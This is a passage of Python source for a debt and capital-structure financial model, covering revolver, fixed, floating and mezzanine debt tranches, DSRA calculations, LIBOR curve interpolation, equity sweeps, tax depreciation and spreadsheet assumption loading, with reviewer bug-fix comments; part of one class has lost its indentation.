        NOTE(review): relies on the module-level PORTFOLIO_START_DATE global.
        """
        # 1) LC fees (placeholder - currently zero)
        lc_fees = 0.0 * self.dsra_months / 12
        # 2) undrawn line fee
        undrawn_line_fee = (self.credit_line - self.principal) * self.undrawn_line_fee * self.dsra_months / 12
        # 3) interest expense
        interest_expense = 0.0
        if self.dsra_months < self.periodicity_months:
            # this is necessary for annual models with 6 month dsra requirements
            # need to determine what correct period to call calc_interest
            # next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
            # interest = self.calc_interest_expense(next_period, self.principal - prepayment)
            # interest_portion = self.dsra_months / self.periodicity_months * interest
            pass
        else:
            if period < self.first_payment_date:
                # determine initial stub period; after the first payment the
                # dsra is only checked on payment dates
                # initially assume stub payment index = first payment index
                # TODO: calc proper stub index rate
                day_count_factor = utils.calc_day_count_factor(self.day_count, PORTFOLIO_START_DATE, self.first_payment_date)
                interest_expense += self.initial_balance * (self.index[period] + self.margin) * day_count_factor
                # determine how many whole payment periods follow
                # assumes month of close counts as 1 month
                dsra_end = utils.calc_next_month_end(PORTFOLIO_START_DATE, 'date', self.dsra_months - 1)
                pmt_periods = int((dsra_end.year * 12 + dsra_end.month - PORTFOLIO_START_DATE.year * 12 -
                                   PORTFOLIO_START_DATE.month) / self.periodicity_months)
                current_period = self.first_payment_date
                next_period = utils.calc_next_month_end(self.first_payment_date, 'date', self.periodicity_months)
                for i in range(pmt_periods):
                    day_count_factor = utils.calc_day_count_factor(self.day_count, current_period, next_period)
                    # assume no paydown in balance
                    interest_expense += self.initial_balance * (self.index[current_period] + self.margin) * day_count_factor
                    current_period = next_period
                    next_period = utils.calc_next_month_end(next_period, 'date', self.periodicity_months)
                # check if stub end period
                stub_months = ((dsra_end.year * 12 + dsra_end.month - PORTFOLIO_START_DATE.year * 12 -
                                PORTFOLIO_START_DATE.month) % self.periodicity_months)
                if stub_months != 0:
                    day_count_factor = utils.calc_day_count_factor(self.day_count, current_period, next_period)
                    # assume no paydown in balance
                    interest_expense += self.initial_balance * (self.index[current_period] + self.margin) * day_count_factor
            else:
                # normal dsra calc on a payment period
                # BUG FIX: the loop bound was recomputed from the moving
                # 'period' each iteration ('while period <
                # calc_next_month_end(period, ...)'), which never terminates;
                # anchor the dsra horizon before looping.
                dsra_horizon = utils.calc_next_month_end(period, 'date', self.dsra_months)
                while period < dsra_horizon:
                    next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
                    day_count_factor = utils.calc_day_count_factor(self.day_count, period, next_period)
                    interest_expense += self.principal * (self.index[period] + self.margin) * day_count_factor
                    period = next_period
        return lc_fees + undrawn_line_fee + interest_expense

    def calc_dsra_change(self, period):
        """Difference between the current DSRA balance and a freshly
        computed requirement (positive = release).

        TODO: figure out day count factor implications at a later time.
        """
        interest = 0.0
        undrawn_line_fee = (self.credit_line - self.principal) * self.undrawn_line_fee
        lc_fees = 0.0
        dsra_new = (interest + lc_fees + undrawn_line_fee) * self.dsra_months / 12
        return self.dsra - dsra_new

    def calc_undrawn_line_fee(self, period):
        """Fee on the undrawn portion of the line for the period ending at
        *period*; the current period's draw is added back so the fee is
        charged on the pre-draw undrawn balance."""
        if self.is_payment_date(period):
            period_end = min(period, self.maturity_date)
            day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
            # ROBUSTNESS FIX: use .get so a payment period with no recorded
            # draw does not raise KeyError
            amount = -(self.credit_line - self.principal - self.letters_of_credit + self.draws.get(period, 0.0)) * self.undrawn_line_fee * day_count_factor
        else:
            amount = 0.0
        return amount

    def calc_lc_fees(self, period):
        """Letter-of-credit fee for the period ending at *period*."""
        period_end = min(period, self.maturity_date)
        day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
        amount = -self.letters_of_credit * self.lc_fee_rate * day_count_factor
        return amount

    def calc_principal_bop(self, period):
        """Beginning-of-period principal: initial balance plus cumulative
        draws and sweeps recorded strictly before *period* (needed for the
        interest-expense calc)."""
        # BUG FIX: original read self.amortization / self.prepayments, which
        # a Revolver never defines (copy-paste from the Debt class); the
        # bare excepts silently swallowed the AttributeError, so the balance
        # never moved off initial_balance.  Use the draws/sweeps histories
        # that set_amount actually maintains.
        draws = 0.0
        sweeps = 0.0
        period_loop = utils.calc_month_end(self.issue_date, 'date')
        while period_loop < period:
            draws += self.draws.get(period_loop, 0.0)
            sweeps += self.sweeps.get(period_loop, 0.0)
            period_loop = utils.calc_next_month_end(period_loop, 'date')
        principal = self.initial_balance + draws + sweeps
        return principal
class Debt:
def __init__(self, **kwargs):
#self.name = name
self.type = kwargs['class']
self.label = kwargs['label']
self.issue_date = kwargs['issue_date'].date()
self.initial_balance = kwargs['initial_balance'] / UNITS
self.annual_amort_percent = kwargs['annual_amort_percent']
self.interest_date_start = kwargs['interest_date_start'].date()
self.amort_date_start = kwargs['amort_date_start'].date()
self.periodicity_months = kwargs['periodicity_months']
#self.set_periodicity_months()
self.amort_const = (self.initial_balance * self.annual_amort_percent / (12 / self.periodicity_months))
self.day_count = kwargs['day_count']
self.sweep_percent = kwargs['sweep_percent']
self.term = kwargs['term']
self.maturity_date = self.issue_date + relativedelta(months=+self.term) + relativedelta(days=-1)
self.oid = kwargs['oid']
self.dfc = kwargs['dfc']
self.flag_prepay_offset = kwargs['flag_prepay_offset']
self.dsra_months = kwargs['dsra_months']
self.dsra = self.initialize_dsra()
self.dsra_interest_rate = kwargs['dsra_interest_rate']
self.flag_prepayable = kwargs['flag_prepayable']
try:
self.flag_swaps = kwargs['flag_swaps']
self.company = kwargs['company']
except:
self.flag_swaps = False
#self.lc_fees = kwargs['lc_fees']
self.principal = self.initial_balance
self.amortization = {}
self.prepayments = {}
self.interest_expense = {}
self.principal_history_bop = {}
self.principal_history_eop = {}
self.dsra_change = 0.0
self.prepayment = 0.0
self.cfas_flag = False
def set_periodicity_months(self):
if self.periodicity == 'monthly':
self.periodicity_months = 1
elif self.periodicity == 'quarterly':
self.periodicity_months =3
elif self.periodicity == 'semiannual':
self.periodicity_months = 6
elif self.periodicity == 'annual':
self.periodicity_months = 12
else:
print('ERROR: unknown periodicity in DebtInstrument ini - ', self.periodicity)
return
def set_amount(self, item, period, cash_flow):
if item == 'interest income':
#not clear if anything needs to happen
pass
elif item == 'dsra release':
self.dsra -= cash_flow
elif item == 'interest expense':
self.interest_expense[period] = cash_flow
elif item == 'amortization':
self.principal_history_bop[period] = self.principal
self.amortization[period] = cash_flow
self.principal += cash_flow
elif item == 'dsra reset':
self.dsra -= cash_flow
elif item == 'sweep':
if self.flag_prepayable:
self.prepayments[period] = cash_flow
self.principal += cash_flow
self.principal_history_eop[period] = self.principal
elif item == 'dsra cleanup':
#self.dsra -= cash_flow
pass
else:
print("Error - unknow item sent to set_amount ", item)
return
def initialize_dsra(self):
#test if initial dsra balance is loaded with debt profile
try:
self.dsra = kwargs['dsra_months']
except:
pass
#if initial dsra balance is not loaded with debt profile, calculate
if not hasattr(self, 'dsra'):
months_to_first_payment = (self.interest_date_start.year * 12 + self.interest_date_start.month -
utils.calc_next_month_end(self.issue_date, 'date', -1).year * 12 -
utils.calc_next_month_end(self.issue_date, 'date', -1).month)
#initialize values
dsra_princ = self.dsra_months / 12 * self.annual_amort_percent * self.initial_balance
dsra_int = 0.0
principal = self.initial_balance
prior_period = self.issue_date
if months_to_first_payment % self.periodicity_months == 0:
#no stub period
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', self.periodicity_months)
#print(principal, prior_period, period, self.dsra_months / self.periodicity_months)
#sys.exit()
for i in range(int(self.dsra_months / self.periodicity_months)):
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
#print(i, interest_rate, day_count_factor, principal)
dsra_int += principal * day_count_factor * interest_rate
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
else:
#has stub periods
#calc interest for initial stub (add one since issue dates are assumed to be first of month)
stub_months = (self.interest_date_start.year * 12 + self.interest_date_start.month -
self.issue_date.year * 12 - self.issue_date.month + 1) % self.periodicity_months
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', stub_months)
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
#calc interest expense for middle, normal periods
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
for i in range(int((self.dsra_months-stub_months)/self.periodicity_months)):
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
#calc interest expense for final stub period
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', self.dsra_months)
#need to get interest rate assuming normal period end
interest_rate = self.calc_interest_rate(utils.calc_next_month_end(prior_period, 'date', self.periodicity_months))
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
dsra = self.amort_const * 2 + dsra_int
return dsra
def is_interest_payment_date(self,period):
if period < self.interest_date_start:
result = False
elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
result = False
elif (period.year * 12 + period.month - self.interest_date_start.year * 12
- self.interest_date_start.month) % self.periodicity_months == 0:
result = True
else:
result = False
return result
def calc_amort(self, period):
if self.is_interest_payment_date(period):
amount = self.annual_amort_percent * self.initial_balance * self.periodicity_months / 12
else:
amount = 0.0
return amount
def calc_date_prior_interest_payment(self, period):
#necessary to calculate number of days in current interest period
#only gets called if (date_diff.months + date_diff.years * 12) % 3 == 0
# so one less * periodicity_months should equal months to prior payment
# need to test for first payment
date_diff = relativedelta(period, self.payment_date_start)
payment_number = (date_diff.months + date_diff.years * 12) % self.periodicity_months
prior_payment_period = utils.calc_month_end(period + relativedelta(months=-self.periodicity_months), 'date')
if prior_payment_period < self.issue_date:
prior_payment_period = self.issue_date
return prior_payment_period
def calc_interest_rate(self, period):
return self.interest_rate
def calc_interest_expense(self, period, principal=None):
if principal == None:
principal = self.principal
if self.is_interest_payment_date(period):
prior_period = self.calc_prior_payment_period(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
int_exp = principal * self.calc_interest_rate(period) * day_count_factor
else:
int_exp = 0.0
if self.flag_swaps:
swap_payment = ins.calc_swaps_payment(self.company, period, YIELD_CURVE_DATE) / UNITS
else:
swap_payment = 0.0
return int_exp + swap_payment
def calc_period_days(self, period):
#return number of days in period for interest calc
prior_payment_period = self.calc_date_prior_interest_payment(period)
return (period - prior_payment_period).days
def calc_next_period(self, period):
#assumes period passed is a current payment period
next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
return next_period
def calc_prior_payment_period(self, period):
#this function assumes it is called from valid payment date
if period <= self.issue_date:
prior_period = None
elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
prior_period = None
elif period <= self.interest_date_start:
prior_period = self.issue_date
else:
prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
return prior_period
def calc_dsra_int_inc(self, period):
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period)
return self.dsra * self.dsra_interest_rate * day_count_factor
def calc_cfas(self, cfas, *args):
#this functions solves for cfas and dsra_change simultaneously
# sets the dsra_change attribute to record results
#TODO add PTD
period, cash = args
prepay = self.sweep_percent * cfas[0]
principal_eop = self.principal - prepay
self.dsra_change = self.calc_dsra(period, principal_eop) - self.dsra
excess_cash = cash + self.dsra_change - cfas
return excess_cash
def calc_interest_income(self, period):
    """Interest earned on the DSRA balance for the period ending *period*.

    Returns 0.0 when no DSRA is held or the instrument has fully rolled off.
    """
    #calc interest income on dsra balances
    # idiom fix: compare to None with 'is', not '=='
    if self.dsra is None or self.dsra == 0:
        interest = 0.0
    elif period >= utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
        # past the final payment date - nothing accrues
        interest = 0.0
    else:
        # cap accrual at maturity
        period_end = min(period, self.maturity_date)
        prior_period = self.calc_prior_payment_period(period)
        day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period_end)
        interest = self.dsra * self.dsra_interest_rate * day_count_factor
    return interest
def calc_dsra_change(self, period, cash):
    """Solve the CFAS equation and return the implied DSRA change.

    calc_cfas records its result on self.dsra_change as a side effect;
    the solved CFAS value itself is discarded.
    """
    #assumes 6 month dsra requirement
    #TODO refactor to allow different dsra terms
    guess = cash
    fsolve(self.calc_cfas, guess, (period, cash))
    return self.dsra_change
def calc_dsra(self, period, principal=None):
    """Required DSRA balance (positive) at *period*.

    Funds the next amortization payment plus the next two interest
    payments, accrued on declining principal.
    NOTE: interest rate is the rate applicable for payment made at period
    date - if quarterly LIBOR, the rate is the 90-day LIBOR ENDING on the
    payment date.
    """
    # idiom fix: compare to None with 'is', not '=='
    if principal is None:
        principal = self.principal
    # principal portion: dsra_months' worth of scheduled amortization
    principal_portion = self.dsra_months / self.periodicity_months * self.amort_const
    # locate the next two payment dates relative to *period*
    months_from_prior_payment = (period.year * 12 + period.month - self.interest_date_start.year * 12
        - self.interest_date_start.month) % self.periodicity_months
    next_period = utils.calc_next_month_end(period, 'date', (self.periodicity_months - months_from_prior_payment))
    next_period_2 = utils.calc_next_month_end(next_period, 'date', self.periodicity_months)
    # interest portion: first coupon on current principal, second on
    # principal net of one amortization step
    interest_portion_1 = (principal * self.calc_interest_rate(next_period) *
        utils.calc_day_count_factor(self.day_count, period, next_period))
    interest_portion_2 = ((principal - self.amort_const) * self.calc_interest_rate(next_period_2) *
        utils.calc_day_count_factor(self.day_count, next_period, next_period_2))
    dsra = principal_portion + interest_portion_1 + interest_portion_2
    return dsra
def calc_principal_bop(self, period):
    """Beginning-of-period principal at *period*.

    Initial balance plus all amortization and prepayments recorded in
    earlier months (both stored as negative cash flows).
    """
    amort = 0.0
    prepay = 0.0
    period_loop = utils.calc_month_end(self.issue_date, 'date')
    while period_loop < period:
        #need try loop as TLC does not have amortization thus no step in the waterfall
        # narrowed from bare 'except:' - a missing month simply contributes 0
        try:
            amort += self.amortization[period_loop]
        except (KeyError, IndexError, TypeError):
            pass
        try:
            prepay += self.prepayments[period_loop]
        except (KeyError, IndexError, TypeError):
            pass
        period_loop = utils.calc_next_month_end(period_loop, 'date')
    principal = self.initial_balance + amort + prepay
    return principal
def calc_tax_interest(self, period, prepayments, month_number, months_in_tax_year):
    """Tax-deductible interest for the tax year containing *period*.

    Combines interest actually booked to date, a forecast of the remaining
    calendar-year months, and straight-line OID/DFC amortization.
    Sign convention: expenses are negative.
    """
    # interest booked so far; interest_expense appears to be a mapping of
    # period -> amount here -- TODO confirm (MezzanineDebt.set_amount
    # appends tuples instead)
    actual = sum(self.interest_expense.values())
    forecast = 0.0
    tax_month = utils.calc_next_month_end(period, 'date')
    # back out the current month's amort to get beginning-of-period principal
    principal_bop = self.calc_principal_bop(period) - self.calc_amort(period)
    # forecast interest through calendar year end on a declining balance,
    # adjusted by the solver's candidate prepayment for this month
    while tax_month <= date(period.year, 12, 31):
        forecast -= self.calc_interest_expense(tax_month, principal_bop + prepayments[month_number])
        principal_bop -= self.calc_amort(tax_month)
        tax_month = utils.calc_next_month_end(tax_month, 'date')
    # straight-line amortization of original issue discount (oid quoted as a
    # price, e.g. 99) and deferred financing costs over the term
    oid = -((100 - self.oid)/100 * self.initial_balance) / self.term * months_in_tax_year
    dfc = -self.dfc * self.initial_balance / self.term * months_in_tax_year
    interest_expense = actual + forecast + oid + dfc
    return interest_expense
class FixedDebt(Debt):
    """Fixed-rate debt tranche: coupon is a constant interest_rate."""
    #TODO move self.interest rate to Debt class
    # need to determine if need FixedDebt class
    def __init__(self, **kwargs):
        self.interest_rate = kwargs['interest_rate']
        Debt.__init__(self, **kwargs)
        #TODO add local function to correctly calc initial dsra requirement
        #self.dsra = self.calc_dsra(self.issuance_date)
    def get_amount(self, item, period, cash=0, prepay=0.0):
        """Signed cash flow requested for waterfall step *item* at *period*.

        Outflows are negative; *cash* is the cash available at this step.
        Exits the process on an unknown item.
        """
        if item == 'amortization':
            amount = -self.calc_amort(period)
        elif item == 'interest expense':
            amount = -self.calc_interest_expense(period)
        elif item == 'sweep':
            # solve for cash-flow-available-for-sweep jointly with DSRA change
            cfas = 0
            sweep = fsolve(self.calc_cfas, cfas, (period, cash))[0]
            amount = -sweep
        elif item == 'dsra change':
            # NOTE(review): Debt.calc_dsra_change takes (period, cash); this
            # call omits cash and would raise TypeError if reached - confirm.
            dsra_change = self.calc_dsra_change(period)
            amount = dsra_change
        elif item == 'interest income':
            amount = self.calc_interest_income(period)
        elif item == 'dsra release':
            #placeholder - replace with test to see if dsra needed to make interest
            # and amoritzation payments
            amount = 0.0
        else:
            # BUG FIX: original referenced the undefined name 'metric' here
            print("Error in FixedDebt get_amount - unknown metric ", item)
            sys.exit()
        return amount
class FloatingDebt(Debt):
    """Floating-rate tranche: interest = index (e.g. LIBOR) + fixed margin.

    The index curve is pulled from the KEAN prices table at construction and
    cached on self.index as {month-end date: rate}.
    """
    def __init__(self, **kwargs):
        self.margin = kwargs['margin']
        self.index_name = kwargs['index_name']
        # NOTE(review): set_index() queries the database before Debt.__init__
        # runs, so it must not rely on attributes Debt.__init__ sets - confirm.
        self.set_index()
        Debt.__init__(self, **kwargs)
    def set_index(self):
        #pull libor curve from KEAN
        self.index = self.get_adj_libor()
        return
    def get_libor(self):
        #purpose: return df of monthly libor rates, these have various forward dates
        #assume LIBOR-1MO initially
        #TO DO: allow different scenarios and versions
        # scenario 'Actuals' is hard-coded; version/valuation date come from
        # the module globals YIELD_CURVE_VERSION / YIELD_CURVE_DATE
        query = ("SELECT period, price FROM prices WHERE scenario = 'Actuals' AND version = %s "
            "AND instrument_id = %s AND valuation_date = %s ORDER BY period")
        df = pd.read_sql(query, cnx, params=(YIELD_CURVE_VERSION, self.index_name, YIELD_CURVE_DATE))
        return df
    def get_adj_libor(self):
        #purpose: convert df from get_libor to curve based on month end dates
        #call get_libor, interpolate/extropolate to month_end data points
        #TODO: overload start and end date to allow extrapolation of rates
        df = self.get_libor()
        period = utils.calc_month_end(df['period'].min(), 'date')
        curve = {}
        # backward linear extrapolation from the first two curve points
        while period < df.iloc[0]['period']:
            #extropolate backwards - should never happen
            increment = (df.iloc[1]['price'] - df.iloc[0]['price']) / (df.iloc[1]['period'] - df.iloc[0]['period']).days
            interval = (df.iloc[0]['period'] - period).days
            curve[period] = df.iloc[0]['price'] - interval * increment
            period = utils.calc_next_month_end(period, 'date')
        # linear interpolation between bracketing curve points, month by month
        while period <= df['period'].max():
            #interpolate
            bottom_date = max(df.loc[(df['period']<=period)]['period'])
            bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
            if period == bottom_date:
                # exact hit on a quoted point
                curve[period] = bottom_yield
            elif df.loc[df['period']>period].shape[0] == 0:
                #need to extropolate - does not happen unless overload start and end dates
                increment = (df.iloc[-1]['price'] - df.iloc[-2]['price']) / ((df.iloc[-1]['period'] - df.iloc[-2]['period']).days)
                interval = (period - df.iloc[-1]['period']).days
                curve[period] = df.iloc[-1]['price'] + interval * increment
            else:
                top_date = min(df.loc[(df['period']>=period)]['period'])
                bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
                top_yield = df.loc[df['period']==top_date]['price'].values[0]
                increment = (top_yield - bottom_yield) / (top_date - bottom_date).days
                interval = (period - bottom_date).days
                curve[period] = bottom_yield + interval * increment
            period = utils.calc_next_month_end(period, 'date')
        #df_curve = pd.DataFrame(curve, columns= ['period', 'libor'])
        return curve
    def get_amount(self, item, period, cash=0.0, prepay=0.0):
        """Signed cash flow requested for waterfall step *item* at *period*.

        Outflows are negative. Most items only pay/accrue on interest
        payment dates; otherwise 0.0. Exits the process on an unknown item.
        """
        #TODO cleanup is_interest_payment_date vs is_payment_date
        if item == 'amortization':
            if self.is_interest_payment_date(period) and period >= self.amort_date_start:
                amount = -self.calc_amort(period)
            else:
                amount = 0.0
        elif item == 'interest expense':
            if self.is_interest_payment_date(period) and period >= self.interest_date_start:
                amount = -self.calc_interest_expense(period, self.principal)
            else:
                amount = 0.0
        elif item == 'sweep':
            amount = 0.0
            if self.flag_prepayable:
                if self.is_interest_payment_date(period):
                    # sweep a fixed percentage of available cash
                    amount = -cash * self.sweep_percent
        elif item == 'interest income':
            if self.is_interest_payment_date(period):
                amount = self.calc_interest_income(period)
            else:
                amount = 0.0
        elif item == 'dsra release':
            #dsra can only be used and therefore reset on a payment date
            amount = self.dsra if self.is_interest_payment_date(period) else 0.0 if False else (self.dsra if self.is_interest_payment_date(period) else 0.0)
        elif item == 'dsra reset':
            #dsra can only be used and therefore reset on a payment date
            if self.is_interest_payment_date(period):
                if self.flag_prepayable:
                    amount = -self.calc_dsra(period, self.principal + prepay)
                else:
                    amount = -self.calc_dsra(period, self.principal)
            else:
                amount = 0.0
        elif item == 'dsra cleanup':
            # residual between required and held DSRA; zero at the solution
            if self.is_interest_payment_date(period):
                amount = -self.calc_dsra(period, self.principal) + self.dsra
            else:
                amount = 0.0
        else:
            print("Error in FloatingDebt get_amount - unknown item ", item)
            sys.exit()
        return amount
    def calc_interest_rate(self, period):
        """All-in rate at *period*: cached index rate plus margin."""
        try:
            self.interest_rate = self.index[period] + self.margin
        except:
            # NOTE(review): bare except - on a missing period this prints and
            # then returns the PREVIOUS self.interest_rate (or raises
            # AttributeError if never set); consider 'except KeyError' + raise.
            print("Error in calc_interest_rate - invalid period ", period)
        return self.interest_rate
class MezzanineDebt(FixedDebt):
    """Mezzanine tranche: fixed cash interest plus optional PIK interest
    that capitalizes into principal.
    """
    def __init__(self, **kwargs):
        self.pik_interest_rate = kwargs['pik_interest_rate']
        FixedDebt.__init__(self, **kwargs)
    def get_amount(self, metric, period, cash=0, prepay=0.0):
        """Signed cash flow requested for *metric* at *period*.

        Mezz has a cash option (lower interest if paying cash; caller must
        pass available cash). Exits the process on an unknown metric.
        """
        if metric == 'interest expense':
            #need to determine both cash interest expense and pik interest expense
            #store pik interest to pik list
            # NOTE(review): flag_cash_interest is read from global scope and is
            # not defined in this file - confirm where it is set; also
            # cash_interest is unbound if the flag matches neither value.
            if flag_cash_interest == 'standard':
                if self.calc_interest_rate(period) > 0.0:
                    cash_interest = self.calc_interest_expense(period)
                else:
                    cash_interest = 0.0
                if self.pik_interest_rate > 0.0:
                    pik_interest = self.calc_pik_interest(period)
            elif flag_cash_interest == 'optional':
                if cash == 0.0:
                    cash_interest = 0.0
                    pik_interest = self.calc_pik_interest(period)
                else:
                    cash_interest = self.calc_interest_expense(period)
                    # any shortfall vs available cash accrues at the PIK rate
                    pik_interest = max(cash_interest - cash, 0.0) * self.pik_interest_rate / self.interest_rate
            # NOTE(review): pik_interest is computed but never returned or
            # stored here - confirm intended handling.
            return cash_interest
        elif metric == 'sweep':
            sweep = cash * self.sweep_percent
            return -sweep
        else:
            # fixed: error message previously named FloatingDebt
            print("Error in MezzanineDebt get_amount - unknown metric ", metric)
            sys.exit()
        return
    def set_amount(self, item, period, cash_flow):
        """Book a solved waterfall cash flow against this tranche.

        NOTE(review): interest_expense/amortization/prepayments are appended
        as (period, amount) tuples here, while Debt.calc_tax_interest and
        calc_principal_bop index them by period - confirm container type.
        """
        if item == 'interest income':
            #not clear if anything needs to happen
            pass
        elif item == 'interest expense':
            self.interest_expense.append((period, cash_flow))
        elif item == 'amortization':
            self.amortization.append((period, cash_flow))
            self.principal += cash_flow
        elif item == 'dsra_change':
            self.dsra_change -= cash_flow
        elif item == 'sweep':
            self.prepayments.append((period, cash_flow))
            self.principal += cash_flow
        elif item == 'pik interest':
            # PIK capitalizes: no cash moves, principal grows
            self.principal += cash_flow
        else:
            print("Error - unknow item sent to set_amount ", item)
        return
    def calc_pik_interest(self, period):
        """PIK interest accrued for the period ending *period* (0 outside
        the accrual window or on non-payment dates)."""
        if period > self.maturity_date:
            pik_exp = 0
        elif period < self.payment_date_start:
            pik_exp = 0
        elif self.is_interest_payment_date(period):
            prior_period = self.calc_prior_payment_period(period)
            day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
            pik_exp = self.principal * self.pik_interest_rate * day_count_factor
        else:
            pik_exp = 0.0
        # BUG FIX: original returned the undefined name 'int_exp' (NameError)
        return pik_exp
class Equity:
    """Residual equity claim: sweeps all remaining cash on its payment dates."""
    def __init__(self, **kwargs):
        self.type = kwargs['class']
        self.label = kwargs['label']
        self.periodicity_months = kwargs['periodicity_months']
        # kwargs carries a datetime; store a date for comparisons
        self.first_payment_date = kwargs['first_payment_date'].date()
        # period -> cash distributed
        self.distributions = {}
        return
    def get_amount(self, item, period, cash=0, prepay=0.0):
        """Signed cash flow requested at *period*; equity takes all
        available cash ('sweep') on payment dates, else 0.0."""
        if item == 'sweep':
            if self.is_payment_date(period):
                amount = -cash
            else:
                amount = 0.0
        else:
            # BUG FIX: original fell through to 'return amount' and raised
            # UnboundLocalError; exit loudly like the debt classes do.
            print("Error - unknow item sent to Equity get_amount ", item)
            sys.exit()
        return amount
    def set_amount(self, item, period, cash=0):
        """Record a distribution made at *period*."""
        if item == 'sweep':
            self.distributions[period] = cash
        else:
            print("Error - unknow item sent to Equity set_amount ", item)
        return
    def is_payment_date(self, period):
        """True when *period* is on the payment cycle starting at
        first_payment_date with spacing periodicity_months."""
        if period < self.first_payment_date:
            result = False
        elif (period.year * 12 + period.month - self.first_payment_date.year * 12
                - self.first_payment_date.month) % self.periodicity_months == 0:
            result = True
        else:
            result = False
        return result
class FixedAsset:
    """A single tax fixed asset with the metadata needed to compute its
    annual tax depreciation."""
    def __init__(self, entity, name, tax_life, convention, method, in_service_date, amount, description):
        #def __init__(self, **kwargs):
        self.entity = entity
        self.name = name
        self.tax_life = tax_life              # years
        self.convention = convention          # 'HY' half-year, 'MM' mid-month, 'NA'
        self.method = method                  # 'SL', 'MACRS' (unimplemented), 'NA'
        self.in_service_date = in_service_date
        self.amount = amount
        self.description = description
    def calc_depreciation(self, period):
        """Annual tax depreciation recognized for the year containing
        *period*; 0.0 before in-service or after the asset's tax life."""
        if period < self.in_service_date:
            return 0.0
        elif period > self.in_service_date + relativedelta(years=self.tax_life):
            return 0.0
        else:
            if period.year == self.in_service_date.year:
                # first (stub) year
                if self.convention == 'NA':
                    stub_factor = 0.0
                elif self.convention == 'HY':
                    stub_factor = 0.5
                elif self.convention == 'MM':
                    # mid-month: remaining months plus half the in-service month
                    stub_factor = ((12 - self.in_service_date.month) + .5) / 12
                else:
                    print("ERROR - Unknown convention in calc_depreciation")
                    sys.exit()
            elif period.year == (self.in_service_date + relativedelta(years=self.tax_life)).year:
                # final (stub) year
                if self.convention == 'HY':
                    stub_factor = 0.5
                elif self.convention == 'MM':
                    stub_factor = (period.month - 0.5) / 12
                elif self.convention == 'NA':
                    stub_factor = 0.0
                else:
                    print("ERROR - Unknown convention in calc_depreciation")
                    sys.exit()
            else:
                stub_factor = 1.0
            if self.method == 'SL':
                method_factor = 1 / self.tax_life
            elif self.method == 'MACRS':
                #add later
                # NOTE(review): falls through with method_factor undefined and
                # would raise NameError below - implement before use.
                pass
            elif self.method == 'NA':
                method_factor = 0.0
            else:
                # BUG FIX: original printed the undefined bare name 'method'
                print("ERROR - Unknown method in calc_depreciation", self.method)
                sys.exit()
            return stub_factor * method_factor * self.amount
class TaxRegister:
    """Per-entity collection of FixedAsset objects for tax depreciation."""
    def __init__(self, name):
        self.entity = name
        self.assets = []
    def add_asset(self, asset):
        """Register one fixed asset with this entity."""
        self.assets.append(asset)
        return
    def calc_depreciation(self, period):
        """Total annual tax depreciation across all registered assets."""
        return sum((asset.calc_depreciation(period) for asset in self.assets), 0.0)
    def print_assets(self):
        """Debug dump of every registered asset's fields."""
        for asset in self.assets:
            print(asset.entity, asset.name, asset.tax_life, asset.convention,
                asset.method, asset.in_service_date, asset.amount, asset.description)
        return
def get_portfolio_from_xlsx():
    """Read portfolio-level assumptions from the 'portfolio' sheet of
    assumptions_template.xlsx and return them as a kwargs dict for
    Portfolio(**kwargs).
    """
    #template is hard coded here
    # 'path' is a module-level global locating this package -- TODO confirm
    path_data = str(Path(path).parent) + '/data/lbo/'
    wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
    ws = wb['portfolio']
    portfolio_kwargs = {}
    # key/value pairs start at row 5 in columns A/B; stop at first blank key
    row = 5
    while ws['a'+str(row)].value is not None:
        key = ws['a' + str(row)].value
        value = ws['b' + str(row)].value
        portfolio_kwargs[key] = value
        row += 1
    wb.close()
    return portfolio_kwargs
def get_cap_struct_from_xlsx():
    """Read the capital structure from the 'capital structure' sheet.

    Returns {instrument name: {kwarg: value}}. Each instrument starts with a
    'name' row; all following rows until the next 'name' are its kwargs.
    """
    #template is hard coded here
    path_data = str(Path(path).parent) + '/data/lbo/'
    wb = opx.load_workbook(path_data + 'assumptions_template.xlsx')
    ws = wb['capital structure']
    #scenario/version fixed location
    # NOTE(review): scenario/version are read but never returned or used
    cap_struct_scenario = ws['b3'].value
    cap_struct_version = ws['b4'].value
    cap_struct = {}
    #name always starts at row 6, variable numbers of kwargs
    instrument_key = ws['b6'].value
    instrument = {}
    row = 7
    while ws['a'+str(row)].value is not None:
        key = ws['a' + str(row)].value
        if key == 'name':
            #close out prior dictionary item
            cap_struct[instrument_key] = instrument
            instrument_key = ws['b' + str(row)].value
            instrument = {}
        else:
            instrument[key] = ws['b' + str(row)].value
        row += 1
    #final entry in dictionary
    cap_struct[instrument_key] = instrument
    wb.close()
    return cap_struct
